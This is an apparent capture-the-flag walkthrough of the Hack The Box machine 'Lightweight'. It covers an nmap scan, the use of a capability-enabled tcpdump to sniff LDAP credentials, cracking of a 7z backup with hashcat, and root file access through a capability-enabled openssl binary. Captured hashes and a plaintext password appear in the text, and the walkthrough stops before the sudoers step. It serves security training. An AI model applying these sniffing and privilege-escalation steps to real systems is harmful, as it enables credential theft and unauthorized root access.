Writeup: Hack The Box - Machines - Lightweight

Description

• Name: Lightweight
• IP: 10.10.10.119
• Author: 0xEA31
• Difficulty: 5.1/10

Discovery

nmap -sV -sC -Pn -p 1-65535 --min-rate 1000 --max-retries 5 10.10.10.119

PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDf7K92wk79uG+iF3K0XaLWtJBrMKM/PfpE01tmpOSxwdhbiXQZ1ggfXFOfjSrkNqO/W3apn2SH1IO3jRCUGmEfXUzmTlX7FKDETKKFJuSZFwdphEqxoX/wCZ+NQhBX9bMT817GjQTNPEmkQsuWUD7PcVBYhRSKohP0jbAc464VKbSeiQt6q1I71CxzUtqMnL7pOREvF41+0K0BNtQUJVKxq5Aq0g67Ba8b0UEecOwgS8O4rZeKrfuYHMXnl6n32XrjqliowOSaZl/iYOu3dgkooIEDFDiaEapOW7J71/Ag/96NWzUf1U91QxCIA2GNtAhXT+Bn+ncbFtWxGdh6enL
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ2F5pumDKrMj6rP99uQehJ2kGbw7z54Ydq7uuZ8FgoTw7wJ44SSytCh1jkrQay1jRg0+4Izw0cqUeW93J5kDCc=
|   256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGwL0BBmHKyKlj3sRMsytml1etD3lMtofGbdxD8aAh1T
80/tcp  open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Issuer: commonName=lightweight.htb
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-06-09T13:32:51
| Not valid after:  2019-06-09T13:32:51
| MD5:   0e61 1374 e591 83bd fd4a ee1a f448 547c
| SHA-1: 8e10 be17 d435 e99d 3f93 9f40 c5d9 433c 47dd 532f
| -----BEGIN CERTIFICATE-----
| MIIB7jCCAVegAwIBAgIFAK3GsbIwDQYJKoZIhvcNAQELBQAwGjEYMBYGA1UEAxMP
| bGlnaHR3ZWlnaHQuaHRiMB4XDTE4MDYwOTEzMzI1MVoXDTE5MDYwOTEzMzI1MVow
| GjEYMBYGA1UEAxMPbGlnaHR3ZWlnaHQuaHRiMIGfMA0GCSqGSIb3DQEBAQUAA4GN
| ADCBiQKBgQCxvnGKmYo2hrfZIWhsg4xxexD5taBmlczGdn8RSN3/X4ByGY17Uk1J
| 8JfYiCVYaD78Hi1QjZVKqpTZQdrU5KC1JqREWvBH/dw+Oat1Q0hFQs1Kuuk7oCAy
| hxYBsqbdqG1j++xAxDRNVJE4rzAS84MkMuM19RcxXdftJKmYaCBoQwIDAQABo0Aw
| PjA8BgNVHREENTAzgg9saWdodHdlaWdodC5odGKCCWxvY2FsaG9zdIIVbG9jYWxo
| b3N0LmxvY2FsZG9tYWluMA0GCSqGSIb3DQEBCwUAA4GBAHcHUNMIiasynONFZpFm
| ehiY2mIbB8YpPfFu5aCyMr0Ws/Zwb2eBkuSW5NDY2J2qqPwlUJcy+pqzYpZHE40z
| Q/rvhBc2XglTApQp4wxFEGRLAoxLmerI/OluxwpYb+J0oKJcf/7gWA+JNRSNP8bY
| cCCEDJ6JnmORKAK04GxKbB+T
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time

gobuster or any intrusive tool on the web-server will cause a ban of the IP address. The web-server should not be enumerated or scanned.

Pwn

The main page shows three links:

1- info

2- status

3- user

From the user page it seems that the box allows SSH connection from IPs that visited the site. Indeed using 10.10.15.103 as username and password for SSH:

Two main users are present on the machine:

ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash

But no access is granted to guest users. Using LinEnum it’s possible to get a list of binaries with some capabilities enabled:

/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

It’s not usual to see tcpdump with capabilities so it must be used to sniff some traffic.

tcpdump -i any -w output.pcap

Let it running for some minutes (~5) got some credentials used to authenticate ldapuser1 and ldapuser2 on OpenLDAP service. A stream showed the sha512crypt hash for both users:

0....`........0....a.
......0:...c5..dc=lightweight,dc=htb
..
.............objectclass0.0y...dt..dc=lightweight,dc=htb0[0,..objectClass1...top..dcObject..organization0...o1...lightweight htb0...dc1
..lightweight0.....d~. cn=Manager,dc=lightweight,dc=htb0Z0#..objectClass1...organizationalRole0...cn1	..Manager0"..description1...Directory Manager0]...dX..ou=People,dc=lightweight,dc=htb050#..objectClass1...organizationalUnit0...ou1...People0[...dV..ou=Group,dc=lightweight,dc=htb040#..objectClass1...organizationalUnit0
..ou1...Group0..:...d..3.-uid=ldapuser1,ou=People,dc=lightweight,dc=htb0...0...uid1..	ldapuser10...cn1..	ldapuser10...sn1..	ldapuser10#..mail1...ldapuser1@lightweight.htb0^..objectClass1O..person..organizationalPerson.
inetOrgPerson..posixAccount..top.
shadowAccount0{..userPassword1k.i{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/0...shadowLastChange1...176910..	shadowMin1...00..	shadowMax1...999990..
shadowWarning1...70..
loginShell1..	/bin/bash0..	uidNumber1...10000..	gidNumber1...10000".
homeDirectory1.../home/ldapuser10..:...d..3.-uid=ldapuser2,ou=People,dc=lightweight,dc=htb0...0...uid1..	ldapuser20...cn1..	ldapuser20...sn1..	ldapuser20#..mail1...ldapuser2@lightweight.htb0^..objectClass1O..person..organizationalPerson.
inetOrgPerson..posixAccount..top.
shadowAccount0{..userPassword1k.i{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn10...shadowLastChange1...176910..	shadowMin1...00..	shadowMax1...999990..
shadowWarning1...70..
loginShell1..	/bin/bash0..	uidNumber1...10010..	gidNumber1...10010".
homeDirectory1.../home/ldapuser20.....d...+cn=ldapuser1,ou=Group,dc=lightweight,dc=htb0f0 ..objectClass1..
posixGroup..top0...cn1..	ldapuser10...userPassword1
..{crypt}x0..	gidNumber1...10000....B.

ldapuser1:$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
ldapuser2:$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1

Another TCP stream from LDAP contains a MD5 hash for ldapuser2:

0Y...`T....-uid=ldapuser2,ou=People,dc=lightweight,dc=htb. 8bc8251332abe1d7f105d3e53ad39ac20....a.
......0....B.

ldapuser2:8bc8251332abe1d7f105d3e53ad39ac2

Trying to crack all the hashes seems to be infeasible even using a big dictionary and hashcat rules. It turns out that the MD5 hash is just the plain password for ldapuser2.

Now inside the SSH connection it’s possible to su to ldapuser2 using the password 8bc8251332abe1d7f105d3e53ad39ac2 and read the first flag.

In the ldapuser2 home there is a backup.7z. This archive is password-protected but using hashcat with 7z2hashcat.pl it’s possible to brute-force the password using rockyou.

hashcat -m 11600 -a 0 backup_hash.txt rockyou.txt -O

The archive contains the backup files for the web server and in status.php there is the ldapuser1 password:

Again, using su it’s possible to get a ldapuser1 session. Running again LinEnum shows two additional ELFs with capabilities:

[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep

openssl can be used to read and write arbitrary files if combined with admin privileges just using ./openssl enc -in /root/root.txt.

To get a root shell it’s possible to add ldapuser1 to sudoers: